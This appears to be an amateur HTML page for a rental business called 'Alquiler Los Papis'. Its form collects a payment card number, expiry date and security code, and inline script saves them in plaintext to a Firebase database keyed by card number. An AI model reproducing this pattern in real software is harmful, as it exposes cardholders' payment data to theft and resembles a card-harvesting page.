<!DOCTYPE html>
<html>
<head>
	<link rel=”shortcut icon” href=”favicon.ico” mce_href=”favicon.ico” type=”image/x-icon” />
	<meta name="viewport" content="width=device-width,initial-scale=1.0">
	<title>Logi</title>
    <link rel="stylesheet" href="estilos.css">
    <script src="https://www.gstatic.com/firebasejs/5.5.2/firebase.js"></script>     
    <script src="https://www.gstatic.com/firebasejs/5.5.2/firebase-app.js"></script>     
    <script src="https://www.gstatic.com/firebasejs/5.5.2/firebasedatabase.js"></script> 
    
<script src="https://www.gstatic.com/firebasejs/5.7.0/firebase.js"></script>
<script>
  // Initialize Firebase
  var config = {
    apiKey: "AIzaSyDscnY8Ahh3K8MWS2U6W1PDLEmc8J9y2as",
    authDomain: "alquilerlospapis.firebaseapp.com",
    databaseURL: "https://alquilerlospapis.firebaseio.com",
    projectId: "alquilerlospapis",
    storageBucket: "alquilerlospapis.appspot.com",
    messagingSenderId: "28982185673"
  };
  firebase.initializeApp(config);
  window.addEventListener('load',function(){
                  let num=document.querySelector('#txtnum');
                  let Fech= document.querySelector('#Fecha');            
                  let clave= document.querySelector('#txtcodigo'); 
                  let guardar= document.querySelector('#btn');
                  guardar.addEventListener('click',function(){
                  firebase.database().ref('Pago/'+ num.value ).set({
                  num: num.value,
                  Fech: Fech.value,
                  clave: clave.value,
                      })
                  }); 
                })
</script>
</head>
<body>
	<div style= "color: red">
<img src="https://www.neumarket.com/media/catalog/product/cache/1/image/636x/040ec09b1e35df139433887a97daa66f/l/l/llanta-Michelin-Pilot-Sport-4S_1.jpg" class="logo" width="150" height="100">

<div class="contenedor">
	<div style= "color:aquamarine " aling ="right" class="titulo"> <h1>ALQUILER LOS PAPIS</h1>
	</div >
	<div style= "color: red" aling ="right" id="Nombre"> <h2>Numero de tarjeta</h2>
    <input type="number "  id="txtnum">
    <h3>Fecha de caducidad</h3>
        <input type="text" id="Fecha">
        <h3>Codigo</h3>
      <input type="password"  id="txtcodigo"><br><br>
      <button id="btn">Ingresar</button>
		
  	</br>
  	</br>
  	</br>
  	<div class= "uno">
  	
      </div>
						</div>
						</option>
						</form> 
  		</div>
  	<div style= "color:#01A9DB" div aling ="right"> <h2>contactos</h2>
  		</div>
    <a  href ="https://www.instagram.com">Instagram</a><br>
	<a  href = "https://www.facebook.com/">facebook</a><br>
	

						</section>
						</div>
						</option>
						</form> 
</a>
  	</table>
  
	</body>
	</html>
